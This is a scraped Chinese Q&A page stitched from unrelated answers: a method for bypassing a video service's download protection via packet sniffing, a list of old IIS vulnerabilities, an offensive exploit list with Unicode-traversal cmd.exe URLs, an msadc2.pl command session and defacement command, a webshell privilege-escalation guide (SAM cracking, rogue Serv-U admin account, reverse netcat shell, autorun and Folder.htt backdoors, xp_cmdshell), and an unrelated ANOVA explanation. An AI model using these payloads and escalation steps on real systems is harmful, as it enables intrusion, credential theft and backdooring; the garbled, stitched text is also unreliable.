在网吧的服务器上用酷抓6下载了几个电影,但是文件名和类型都是webmedia.tfs。如何打开它?无知者勿扰!
Webplayer在WIN2K上图象显示不正常,除了连续剧,大片都不能看,所以我才想到下载来看,但是Viewgood设计目之一就是防止你下载,怎么破解呢?
1、抓包。
用包侦听工具侦听,可以从你用的电脑上,也可以从网关电脑上侦听,侦听到的数据中就包含影片网址,这是我抓到的数据包:
GET /webmedia/webmediatfscmd=1&uuid=78aec17c-ad4d-4190-b230-7655b1f189e&prog_i
d=20883&server_id=6&customer_id=2&local=192168110&proxy=&filetype=rmvb&reques
ttype=1&Offset=0 HTTP/11 Accept: image/gif, image/x-xbitmap, image/jpeg, image
/pjpeg, application/vndms-powerpoint, application/vndms-excel, application/msw
ord, application/vgplayer, application/x-shockwave-flash, / Connection: Keep-
Alive Host: 2226218714 User-Agent: Viewgood/10 (1; 1; 1) Accept-Encoding:
gzip, deflate ^[[0m
这个数据包的意思可以参考HTTP协议。根据Host: 和GET /webmedia/webmediatfs……,我们可以合成影片网址:[url]http://2226218714/webmedia/webmediatfscmd=1&uuid=78aec17c-ad4d-4190-b230-7655b1f189e&prog_id=20883&server_id=6&customer_id=2&local=192168110&proxy=&filetype=rmvb&requesttype=1&Offset=0[/url]
2、用FRONTPAGE下载
什么?黑客也用FRONTPAGE?不可以么?
在FRONTPAGE里建个新网页,随便打上一串字符,选中,设置超链接为影片网址。然后预览,右击超链接,另存,就可以下载了,下载的文件名是webmediatfs,下载完了改个文件名,比如falfkjalfjarmvb,只要扩展名是rmvb,就可以用realplayer播放了。
3、照前文所述方法,下载小的**文件可以,大文件只能下载1~4百兆左右的东西,前文所述的方法需要改进。这篇文章是以前写的,没写完。要想下载整个**文件,还要费点周折。
我们用抓包方法合成URL,用FRONTPAGE下载,这两步操作要多做几次,每次下载**文件一部分,最后用realproducer进行文件合并。这样我们需要在下载每一部分的时候,确定下载的起始位置和下载长度,换言之,就是冒充webplayer客户读取**内容。如何确定下载起始位置和文件长度,需要多抓些包,你用播放影片时拖动,多拖动几次,慢慢就可以算出每段的起始位置和下载长度,这个位置和长度肯定是有规律的,每个分段大约是15秒**数据大小的整数倍,有耐心,搞这个值不难,不过我挤不出时间搞这东西,只能提供一种思路。
系统漏洞如果不补的话,会增加感染病毒的机会,但也不是绝对的 你可以把安装在C盘里的应用程序卸载,然后安装到除系统分区之外的分区,这样就可以节省出很多的硬盘空间系统补丁还是要打的,不然感染病毒也是麻烦事 主要漏洞及危害如下: 一、Unicode漏洞 1.漏洞危害 在Unicode字符解码时,IIS 40/50存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当用户用IIS打开文件时,如果该文件名包含Unicode字符,系统会对其进行解码。如果用户提供一些特殊的编码,将导致IIS错误地打开或者执行某些Web根目录以外的文件。未经授权的用户可能会利用 IUSR_machinename账号的上下文空间访问任何已知的文件。该账号在默认情况下属于Everyone和Users组的成员,因此任何与Web 根目录在同一逻辑驱动器上的能被这些用户组访问的文件都可能被删除、修改或执行。通过此漏洞,您可查看文件内容、建立文件夹、删除文件、拷贝文件且改名、显示目标主机当前的环境变量、把某个文件夹内的全部文件一次性拷贝到另外的文件夹去、把某个文件夹移动到指定的目录和显示某一路径下相同文件类型的文件内容等等。 2.漏洞成因 Unicode漏洞的成因可大致归结为: 从中文Windows IIS 40+SP6开始,还影响中文Windows 2000+IIS 50、中文Windows 2000+IIS50+SP1。台湾繁体中文也同样存在这样的漏洞。它们利用扩展Unicode字符(如利用“/”取代“/”和“\”)进行目录遍历漏洞。据了解,在Windows NT中编码为%c1%9c,在Windows 2000英文版中编码为%c0%af。 3.漏洞检测 首先,对网络内IP地址为的Windows NT/2000主机,您可以在IE地址栏http:// ;;/scripts/%c1%1c/winnt/system32/cmdexe/c+dir(其中%c1%1c为 Windows 2000漏洞编码,在不同的操作系统中,您可使用不同的漏洞编码),如漏洞存在,您还可以将Dir换成Set和Mkdir等命令。 其次,您要检测网络中某IP段的Unicode漏洞情况,可使用有如Redexe、SuperScan、RangeScan扫描器、Unicode扫描程序Uni2pl及流光Fluxay47和SSS等扫描软件来检测。 4.解决方法 若网络内存在Unicode漏洞,可采取如下方法进行补救: (1)限制网络用户访问和调用CMD命令的权限; (2)若没必要使用scriptS和MSADC目录,删除或改名; (3)安装Windows NT系统时不要使用默认WINNT路径,您可以改为其他的文件夹,如C:\mywindowsnt; (4)用户可从如下地址下载Microsoft提供的补丁 http://wwwmicrosoftcom/ntserver/nts/downloads/critical/q269862/defaultasp 为IIS 40的补丁地址, http://wwwmicrosoftcom/windows2000/downloads/critical/q269862/defaultasp 为IIS 50补丁地址。 二、ida/idq缓冲区溢出漏洞 1.漏洞危害及成因 作为安装IIS过程的一部分,系统还会安装几个ISAPI扩展dlls,其中idqdll是Index Server的一个组件,对管理员脚本和Internet数据查询提供支持。但是,idqdll在一段处理URL输入的代码中存在一个未经检查的缓冲区,攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出,从而执行自己提供的代码。更为严重的是,idqdll是以System身份运行的,攻击者可以利用此漏洞取得系统管理员权限。 2.解决方法 用户可以分 http://wwwmicrosoftcom/Downloads/ReleaseaspReleaseID=30833http://wwwmicrosoftcom/Downloads/ReleaseaspReleaseID=30800 处下载补丁,或删除对idq和ida的脚本映射。如果其他系统组件被增删,有可能导致该映射被重新自动安装。 注意:安装Index Server或Index Services而没有安装IIS的系统无此漏洞;另外,即使Index Server/Indexing Service没有开启,但是只要对idq或ida文件的脚本映射存在,攻击者也能利用此漏洞。受影响平台有Windows NT 40、Windows 2000、Windows XP beta; 受影响的版本有Microsoft Index Server 20、Indexing Service in Windows 2000。 三、Microsoft IIS CGI 文件名错误解码漏洞 1.漏洞危害及成因 IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行Http解码,然后判断此文件名是否为可执行文件,如检查后缀名是否为 “exe”或“com”等。在文件名检查通过之后,IIS会进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,当漏洞被攻击后, IIS会错误地将已经解过码的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码两次。通过精心构造CGI文件名,攻击者可以绕过 IIS对文件名所做的安全检查。在某些条件下,攻击者可以执行任意系统命令。 2.漏洞检测 该漏洞对IIS 40/50(SP6/SP6a没有安装)远程本地均适用,您可通过前文所述的SSS软件进行测试。 3.解决方法 如果您的主机有此漏洞, http://wwwmicrosoftcom/Downloads/ReleaseaspReleaseID=29787 处下载补丁。 四、MSADCS RDS弱点漏洞 1.漏洞危害 虽然MSADCS RDS弱点漏洞对许多黑客来说已经有点儿过时,不过,对于网络上一些粗心大意的网管来说,还是有为数众多的机器并没有针对这个漏洞进行防堵。 该漏洞可以导致攻击者远程执行用户系统的命令,并以设备用户的身份运行。 2.漏洞成因 此漏洞是因Windows NT 40 Option Pack中的组件MDAC(即Microsoft Data Access Components)引起的,它包含了一项RDS(Remote Data Service)的功能。RDS是Microsoft提供给使用者远程访问数据库的服务,它能够让使用者透过ODBC远程存取/查询服务器数据库中的数据信息,而在IIS服务器中,还能够让使用者通过一个位于/msadc虚拟目录内名为msadcsdll的文件提供RDS服务,以便与远程使用者沟通。 3.漏洞检测 用户可使用Shadow Security Scanner 535(本文简称SSS)、流光Fluxay 47、Nmap以及SuperScan或 MSADC2PL (Perl程序,执行需要ActivePerl环境,您可去雨林小网站下载,网 http://wwwwiretripnet/rfp )来进行测试,也可以通过以下办法测试本机是否存在这个漏洞。 c:\>nc -nw -w 2 <目标机> 80 GET /msadc/msadcsdll HTTP 4.解决方法 其实,Microsoft对关于Msadc的问题发了3次以上的补丁,但仍然存在问题。 笔者认为最好的办法是:通过移除或删除系统内/msadc目录,同时移除c:\Program Files\Common Files\System\Msadc\msadcsdll,或安装MDAC 21 SP2补丁(下载网 http://wwwmicrosoftcom/data/downloadhtm ),并注意及时上网更新。 五、FrontPage 服务器扩展漏洞 1.漏洞危害 该漏洞对网站构成严重威胁,可以让入侵者轻易地获得整个网站的信息。 2.漏洞成因 对于安装Frontpage服务器的网站,通常会在Web目录(缺省)下有若干个以字母“_vti”开头的目录,正是这些目录隐藏了潜在的攻击性。 当用户在任何常用的搜索引擎上搜索默认的Frontpage目录时,会得到大量从引擎上返回的信息,这时,给入侵者一可乘之机,使他们得以对服务器进行简单而又反复的攻击。 对攻击者来说,此漏洞可使他们获得被攻击方的Frontpage口令文件、通过Frontpage扩展名执行任意二进制文件,以及通过用_vti_cnf替换indexhtml,即入侵者能看到该目录下的所有文件,并有可能获得访问权限等。 3.解决方法 如对目录定义许可、移去某些目录、设置用户密码或不安装Frontpage扩展服务器等。 六、Printer漏洞 1.漏洞危害及成因 此漏洞只存在于运行IIS 50的Windows 2000服务器中。由于IIS 5的打印ISAPI扩展接口建立了printer扩展名到Msw3prtdll的映射关系(缺省情况下该映射也存在),当远程用户提交对 printer的URL请求时,IIS 50会调用Msw3prtdll解释该请求,加之Msw3prtdll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对 printer的URL请求,其“Host:”域包含大约420B的数据,此时在Msw3prtdll中发生典型的缓冲区溢出,潜在地允许执行任意代码。在溢出发生后,Web服务会停止用户响应,而Windows 2000将接着自动重启它,进而使得系统管理员很难检查到已发生的攻击。 2.漏洞检测 针对Printer漏洞的检测软件很多,如easyscahttp:// wwwnetguardcomcn )、x-scaner http:// wwwxfocusorg )和SSS等。 3.解决方法 可通过安装Microsoft漏洞 http://wwwmicrosoftcom/Downloads/ReleaseID=29321 来解决此影响系统的安全问题。
你说的漏洞比较广,是软件漏洞还是系统 系统漏洞还有server漏洞还有iis漏洞 我就和你说说iis漏洞吧。1 iis4hack缓冲溢出
主要存在于htr,idc和stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishackexe,ncxexe,你可以到下面 的站点wwwtechnotroniccom去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncxexe放到你自己相应的目录下,然后使用iishackexe来检查目标机器:
c:>iishackexe <victim> 80 <your web server>/ncxexe
然后你就使用netcat来连接你要检测的服务器:
c:>nc <victim> 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hackzip
2msadc
IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2pl,我们看看它的help
[quack@chat quack]$ perl msadc2pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadcpl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2pl -h http://wwwtargecom/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindexhtm
3Codebrwsasp
察看文件源代码
http://wwwvictimcom/iisamples/exair/howitworks/codebrwsaspsource=/iisamples/exair/howitworks/codebrwsasp
4Showcodeasp
察看文件源代码
http://wwwvictimcom/msadc/samples/selector/showcodeaspsource=/msadc//////winnt/winini
5Nullhtw
察看文件源代码
http://wwwvictimcom/nullhtwCiWebhitsfile=/defaultasp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6webhitsdll & htw
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给htw文件,Webhitsdll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://wwwvictimcom/nosuchfilehtw 如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid这就表示你存在这个漏洞 这个问题主要就是webhitsdll关联了htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhithtw
/iissamples/issamples/oop/qsumrhithtw
/isssamples/exair/search/qfullhithtw
/isssamples/exair/search/qsumrhithtw
/isshelp/iss/misc/iirturnhhtw (这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://wwwvictimcom/iissamples/issamples/oop/qfullhithtw
ciwebhitsfile=///winnt/winini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中winini文件的内容。 7ASP Alternate Data Streams(::$DATA) 要查看一些asp文件的内容,你可以请求如下的URL: http://wwwvictimcom/defaultasp::$DATA你就得到了源代码
8ASP Dot Bug
在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。
http://wwwvictimcom/sampleasp
9ISMDLL
这个漏洞是由Cerberus Information Security team最早发现的,它运行在IIS40和50上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者%20(这些表示空格)并追加htr的特殊请求给IIS,会使IIS认为客户端请求的是htr文件,而htr文件的后缀映射到ISMDLL ISAPI应用程序,这样IIS就把这个htr请求转交给这个DLL文件,然后ISMDLL 程序把传递过来的文件打开和执行,但在ISMDLL 截断信息之前,缓冲区发送 一个截断开的 Htr 并会有一些时间去返回一些你要打开的文件内容 除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 htr 请求到机器上,那么这攻击会失效它只能在 ISMDLL第一次装入内存时工作CNNS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。
http://wwwvictimcom/globalasa%20%20(<=230)globalasahtr
10 idc & ida Bugs
这个漏洞实际上类似ASP dot 漏洞,其能在IIS40上显示其WEB目录信息,很奇怪的说有些还在IIS50上发现过此类漏洞,通过增加idc或者ida 后缀到URL会导致IIS尝试允许通过数据库连接程序DLL来运行IDC,如果此idc不存在,它就返回一些信息给客户端。
http://wwwvictimcom/anythingidc 或者 anythingidq
11+htr Bug
对有些ASA和ASP追加+htr的URL请求就会导致文件源代码的泄露:
http://wwwvictimcom/globalasa+htr
12NT Site Server Adsamples
通过请求sitecsc,一般保存在/adsamples/config/sitecsc中,攻击者 可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:
http://wwwvictimcom/adsamples/config/sitecsc
13/iisadmpwd
IIS40中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。 每个IIS40安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个 htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制 在loopback addr(127001),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下:
c:winntsystem32inetsrviisadmpwd
Achghtr
Aexphtr
Aexp2htr
Aexp2bhtr
Aexp3htr
Aexp4htr
Aexp4bhtr
Anothtr
Anot3htr
这样,攻击者可以通过暴力来猜测你的密码。
14Translate:f Bug
泄露asp文件源代码 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f 后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁 为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS40上,所以在IIS40上也有这个漏洞。利用程序: trasn1pl,trans2pl
15Unicode
IIS 40和IIS 50在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊 的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
http://wwwvictimcom/scripts/%c1%1c/winnt/system32/cmdexe/c+dir
http://wwwvictimcom/scripts/%c0%af/winnt/system32/cmdexe/c+dir
http://wwwvictimcom/scripts/%c1%9c/winnt/system32/cmdexe/c+dir
http://wwwvictimcom/aasp/%c1%1c/%c1%1c/winnt/winini
可能需要察看以下几个目录
GET
/scripts/%c0%af%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\
HTTP/10rnrn
GET
/msadc/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\
HTTP/10rnrn
GET
/_vti_bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\
HTTP/10rnrn
GET
/_mem_bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\
HTTP/10rnrn
GET
/cgi-bin/%c0%af%c0%af%c0%af/winnt/system32/cmdexe/c+dir+c:\
HTTP/10rnrn
eeye开发了工具包iishack15针对这一漏洞进行测试
16iis50 缓冲溢出
微软Win 2K IIS
5的打印ISAPI扩展接口建立了printer扩展名到msw3prtdll的映射关系,缺省情况下该映射存在。当远程用户提交对printer的URL请求时,IIS
5调用msw3prtdll解释该请求。由于msw3prtdll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prtdll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。利用程序见iis5hackzip
17IIS CGI文件名二次解码漏洞
IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为"exe"或"com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。
通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"/"或"/"的检查,在某些条件下,攻击者可以执行任意系统命令。
例如,对于’’这个字符,正常编码后是%5c。这三个字符对应的编码为:
’%’ = %25
’5’ = %35
’c’ = %63
如果要对这三个字符再做一次编码,就可以有多种形式,例如:
%255c
%%35c
%%35%63
%25%35%63
因此,""就可以表示成"%255c"或"%%35c"等等形式。在经过第一次解码之后,变成"%5c"。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成""。因此攻击者就可以使用""来进行目录遍历,执行web目录之外的任意程序。 好了 先到这里。。。。漏洞太多了不过还是微软系统排第一的 一个是使用的人群广 一个是XXX 哈哈哈
在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津 津乐道的话题,也是[被屏蔽的不受欢迎关键词]高shou和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望 对大家有所启发,起到一个抛砖引玉的作用 WEBSHELL权限提升技巧 c: d: e: C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写 入bat,vbs等木马。 根目录下隐藏autoruninf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folderhtt与desktopini 将改写的Folderhtt与desktopini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的 目录下 replace 替换法 捆绑 脚本 编写一个启动/关机脚本 重起 删SAM 错 CAcls命令 FlashFXP文件夹Sitesdat Sitesdatbak Statsdat Statsdatbak Ring的权限提升21大法! 以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过 的。本人不才,除了第一种方法自己研究的,其他的都是别人的经验总结。希望对朋友有帮助! 1radmin连接法 条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去 。本人从来米成功过。,端口到是给对方打开了。 2paanywhere C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF 文件,在本地安装pcanywhere上去 3SAM破解 C:\WINNT\system32\config\ 下他的SAM 破解之 4SU密码夺取 C:\Documents and Settings\All Users\「开始」菜单\程序\ 引用:Serv-U,然后本地查看属性,知道路径后,看能否跳转 进去后,如果有权限修改ServUDaemonini,加个用户上去,密码为空 [USER=WekweN|guxin] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYvalues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 5c:\winnt\system32\inetsrv\data\ 引用:就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去, 然后执行 6SU溢出提权 这个网上教程N多 不详细讲解了 7运行Csript 引用:运行"cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps"来提 升权限 用这个cscript C:\Inetpub\AdminScripts\adsutilvbs get w3svc/inprocessisapiapps 查看有特权的dll文件:idqdll httpextdll httpodbcdll ssincdll msw3prtdll 再将aspdll加入特权一族 aspdll是放在c:\winnt\system32\inetsrv\aspdll (不同的机子放的位置不一定一样) 我们现在加进去cscript adsutilvbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idqdll" "C:\WINNT\system32\inetsrv\httpextdll" "C:\WINNT\system32\inetsrv\httpodbcdll" "C:\WINNT\system32\inetsrv\ssincdll" "C:\WINNT\system32\msw3prtdll""c:\winnt\system32 \inetsrv\aspdll" 可以用cscript adsutilvbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 8脚本提权 c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs 9VNC 这个是小花的文章 HOHO 默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password 我们可以用vncx4 破解它,vncx4使用很简单,只要在命令行下输入 c:\>vncx4 -W 然后顺序输入上面的每一个十六进制数据,没输完一个回车一次就行了。 10NC提权 给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 11社会工程学之GUEST提权 很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮 箱号 手机号 尽量看看 HOHO 12IPC空连接 如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 13替换服务 这个不用说了吧?个人感觉相当复杂 14autorun inf autorun=xxxexe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信 他不运行 15desktopini与Folderhtt 引用:首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择"自定义 文件夹"(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktopini的文件,(如果你看不到,先取消"隐藏受保护的操作系统文件")然后 我们在Folder setting目录下找到Folderhtt文件,记事本打开,在任意地方加入以下代码: <OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后门文件名"> </OBJECT> 然后你将你的后门文件放在Folder setting目录下,把此目录与desktopini一起上传到对方 任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门 16su覆盖提权 本地安装个su,将你自己的ServUDaemonini文件用从他那下载下来的ServUDaemonini 覆盖掉,重 起一下Serv-U,于是你上面的所有配置都与他的一模一样了 17SU转发端口 43958这个是 Serv -U 的本地管理端口。FPIPEexe上传他,执行命令: Fpipe –v –l 3333 –r 43958 127001 意思是将4444端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个 服务器,IP填对方IP,帐号为LocalAdministrator 密码为<img align="absmiddle" src="skins/default/email1gif" alt=""/><a href="mailto:#1@$ak#1k;0@p" target="_blank">#1@$ak#1k;0@p</a> 连接上后你就可以管理他的 Serv-u了 18SQL帐户密码泄露 如果对方开了MSSQL服务器,我们就可以通过用SQL连接器加管理员帐号(可以从他的连接数据库的 ASP文件中看到),因为MSSQL是默认的SYSTEM权限。 引用:对方没有删除xp_cmdshell 方法:使用Sqlexecexe,在host 一栏中填入对方IP,User与Pass 中填入你所得到的用户名与密码。format选择xp_cmdshell"%s"即可。然后点击connect,连接上后就可 以在CMD一栏中输入你想要的CMD命令了 19aspdll 引用:因为aspdll是放在c:\winnt\system32\inetsrv\aspdll (不同的机子放的位置不一定相同 ) 我们现在加进去cscript adsutilvbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idqdll" "C:\WINNT\system32\inetsrv\httpextdll" "C:\WINNT\system32\inetsrv\httpodbcdll" "C:\WINNT\system32\inetsrv\ssincdll" "C:\WINNT\system32\msw3prtdll""c:\winnt\system32 \inetsrv\aspdll" 好了,现在你可以用cscript adsutilvbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去 了,注意,用法中的get和set,一个是查看一个是设置还有就是你运行上面的你要到 C:\Inetpub\AdminScripts>这个目录下 那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把 aspdll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东 20Magic Winmail 前提是你要有个webshell 引用:<a href="http://wwweviloctalcom/forum/readphptid=3587">http://wwweviloctalcom/forum/readphptid=3587</a>这里去看吧 21DBO…… 其
参考资料:
DF:degree freedom自由度,自由度是在计算某一测量系统时不受限制的变量数。
SS:Stdev square 方差,表示均值偏差的平方和和数据的总变化量。
MS:Mean square均方差,其值等于对应的SS除以DF。
方差分析的基本思想是:通过分析研究不同来源的变异对总变异的贡献大小,从而确定可控因素对研究结果影响力的大小。
扩展资料:
方差分析的基本原理是认为不同处理组的均数间的差别基本来源有两个:
(1) 实验条件,即不同的处理造成的差异,称为组间差异。用变量在各组的均值与总均值之偏差平方和的总和表示,记作SSb,组间自由度dfb。
(2) 随机误差,如测量误差造成的差异或个体间的差异,称为组内差异,用变量在各组的均值与该组内变量值之偏差平方和的总和表示, 记作SSw,组内自由度dfw。
总偏差平方和 SSt = SSb + SSw。
组内SSw、组间SSb除以各自的自由度(组内dfw =n-m,组间dfb=m-1,其中n为样本总数,m为组数),得到其均方MSw和MSb,一种情况是处理没有作用,即各组样本均来自同一总体,MSb/MSw≈1。
另一种情况是处理确实有作用,组间均方是由于误差与不同处理共同导致的结果,即各样本来自不同总体。那么,MSb>>MSw(远远大于)。
MSb/MSw比值构成F分布。用F值与其临界值比较,推断各样本是否来自相同的总体 。
0条评论